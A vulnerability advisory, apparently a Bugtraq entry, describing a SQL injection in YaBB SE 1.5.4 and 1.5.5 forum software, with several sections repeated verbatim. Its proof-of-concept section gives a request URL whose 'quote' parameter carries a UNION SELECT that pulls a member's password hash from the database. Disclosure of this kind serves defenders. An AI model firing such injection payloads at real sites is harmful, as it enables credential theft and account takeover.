YABB SE Quote Parameter SQL Injection Vulnerability
BID:9674
Info
YABB SE Quote Parameter SQL Injection Vulnerability
| Bugtraq ID: | 9674 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0291 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 16 2004 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | The disclosure of this issue has been credited to BackSpace <[email protected]>. |
| Vulnerable: |
YaBB SE YaBB SE 1.5.5 YaBB SE YaBB SE 1.5.4 |
| Not Vulnerable: | |
Discussion
YABB SE Quote Parameter SQL Injection Vulnerability
It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software.
YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.
It has been reported that YaBB SE may be prone to a SQL injection vulnerability that may allow a remote user to inject arbitrary SQL queries into the database used by the software.
YaBB SE versions 1.5.4 and 1.5.5 have been reported to be affected by this issue, however, other versions could be affected as well.
Exploit / POC
YABB SE Quote Parameter SQL Injection Vulnerability
No exploit is required.
The following proof of concept has been supplied:
http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
l,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
No exploit is required.
The following proof of concept has been supplied:
http://www.example.com/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,nul
l,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
Solution / Fix
YABB SE Quote Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
YABB SE Quote Parameter SQL Injection Vulnerability
References:
References:
- YaBB SE Project Page (YaBB SE)
- Another YabbSE SQL Injection ("backspace"